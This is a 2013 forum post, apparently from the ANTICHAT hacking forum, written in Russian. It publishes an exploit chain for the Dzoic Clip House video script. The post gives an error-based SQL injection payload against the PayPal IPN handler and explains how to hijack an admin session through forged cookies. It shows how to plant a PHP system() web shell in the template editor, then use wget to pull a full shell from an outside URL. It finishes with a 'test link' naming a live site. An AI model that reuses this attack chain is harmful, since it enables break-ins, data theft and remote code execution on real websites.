Dzoic Clip House — ANTICHAT Forum

15.01.2013, 11:44

MaSTeR GэN

Участник форума

Регистрация: 23.05.2008

Сообщений: 121

Провел на форуме:
305110

Репутация: 133

Отправить сообщение для MaSTeR GэN с помощью ICQ

Dzoic Clip House exploit

URL производителя : http://dzoic.com/

DEMO: http://www.cliphousedemo.com/

Error based sql inj

CODE(/psystems/paypal/paypal_ipn.php):

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]else{

        

[/COLOR][COLOR="#0000BB"]$sql_query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"DELETE FROM payment_gateway WHERE order_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$paypal[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]ipn_data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'custom'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"DB"[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]execute[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql_query[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]

exploit:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.test.com/psystems/paypal/paypal_ipn.php

[/COLOR][COLOR="#0000BB"]post[/COLOR][COLOR="#007700"]:

[/COLOR][COLOR="#0000BB"]custom[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]=([/COLOR][COLOR="#0000BB"]select 1 from[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]select count[/COLOR][COLOR="#007700"](*),[/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]version[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]floor[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]x from information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables group by x[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"])

[/COLOR][/COLOR]

Заливка шелла:

1.Если не подобрался админ пасс дергаем админ сессию куки:

mem_id:100000

password:хеш_пароля из бд

sess_id:ид сессии из базы

2.Лезим в редактирование шаблонов "http://test.com/administrator/index.php?section=composer"

3.Создаем новую страницу и туда пихаем

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]}

[/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]cmd[/COLOR][COLOR="#007700"]]);

{/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]}

[/COLOR][/COLOR]

4.Заливаем нормальный шелл :

http://test.com/index.php

post:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]page_name[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]cmd[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]wget[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]O[/COLOR][COLOR="#007700"]./[/COLOR][COLOR="#0000BB"]uploader[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]swf[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//url.com/shell.txt

[/COLOR][/COLOR]

5.Юзаем полноценный шелл по адреcу http://test.com/uploader/tmp/swf.php

TEST LINK:http://vidiload.com/

ANTICHAT — форум по информационной безопасности, OSINT и технологиям